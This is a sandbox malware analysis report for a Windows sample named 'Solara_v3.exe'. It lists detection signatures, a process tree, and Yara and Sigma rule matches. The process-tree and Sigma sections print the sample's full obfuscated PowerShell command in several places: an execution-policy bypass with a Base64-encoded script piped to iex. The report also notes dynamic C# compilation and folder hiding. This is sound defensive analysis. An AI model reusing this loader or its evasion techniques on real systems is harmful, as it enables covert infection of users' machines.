Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Solara_v3.exe

Overview

General Information

Sample name:Solara_v3.exe
Analysis ID:1585428
MD5:404f9a9a90f2729d0acba7e76527fb88
SHA1:441a37963638e3f4635ef8c5fa35fd8fa566e325
SHA256:96559ba94a96b7a3ab66125a3556c6a8ec07fe561f8d60bd06f66520e3366c5e
Tags:exeuser-aachum
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Solara_v3.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\Solara_v3.exe" MD5: 404F9A9A90F2729D0ACBA7E76527FB88)
    • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7492 cmdline: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 7644 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7660 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A60.tmp" "c:\Users\user\AppData\Local\Temp\py0wfw3n\CSCB237945D4EF64F37AEB0937E3F152BA1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • attrib.exe (PID: 7684 cmdline: "attrib" +h C:\WindowsSystem MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7492INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x21c32:$b2: ::FromBase64String(
  • 0x21c11:$b3: ::UTF8.GetString(
  • 0x6e33b:$s1: -join
  • 0x6e376:$s1: -join
  • 0x6e430:$s1: -join
  • 0x6e45e:$s1: -join
  • 0x6e603:$s1: -join
  • 0x6e626:$s1: -join
  • 0x6e8d9:$s1: -join
  • 0x6e8fa:$s1: -join
  • 0x6e92c:$s1: -join
  • 0x6e974:$s1: -join
  • 0x6e9a1:$s1: -join
  • 0x6e9c8:$s1: -join
  • 0x6e9f3:$s1: -join
  • 0x6ea0f:$s1: -join
  • 0x6ea78:$s1: -join
  • 0x6eefe:$s1: -join
  • 0x6ef20:$s1: -join
  • 0x6ef78:$s1: -join
  • 0x6efa2:$s1: -join

Other

SourceRuleDescriptionAuthorStrings
amsi64_7492.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZ
    Sigma detected: Change PowerShell Policies to an Insecure Level
    Source: Process startedAuthor: frack113: Data: Command: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZ
    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABP
    Sigma detected: Suspicious Execution of Powershell with Base64
    Source: Process startedAuthor: frack113: Data: Command: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyA